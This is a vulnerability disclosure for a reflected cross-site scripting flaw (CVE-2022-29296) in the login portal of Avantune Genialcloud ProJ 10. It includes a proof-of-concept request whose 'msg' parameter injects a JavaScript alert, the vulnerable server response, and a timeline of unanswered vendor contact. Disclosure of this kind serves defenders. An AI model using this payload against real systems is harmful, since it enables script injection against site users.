Avantune Genialcloud ProJ 10 Cross Site Scripting

# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)# Date: 2022-06-01# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.avantune.com# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com# Version: 10# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)# CVE: CVE-2022-29296Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from thesame software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to injectand execute arbitrary web scripts or HTML via a crafted payload.Request parameters affected is "msg".PoC Request:GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1Host: [REDACTED]Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US,en-GB;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36Connection: closeCache-Control: max-age=0PoC Response:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 11 May 2022 10:51:10 GMTConnection: closeContent-Length: 8162<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet"...[SNIP]...<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>...[SNIP]...Timeline:2022-01-05: Vulnerability discovered.2022-01-06: Vendor contacted.2022-02-07: No reply, vendor contacted for 2nd time.2022-02-10: Request for CVE reservation.2022-04-16: Assigned CVE number CVE-2022-29296.2022-05-07: No reply, vendor contacted for 3rd time.2022-06-01: Public disclosure.PoC Screenshots:https://imagebin.ca/v/6j86ekMqKZD8https://postimg.cc/XXv6YbK9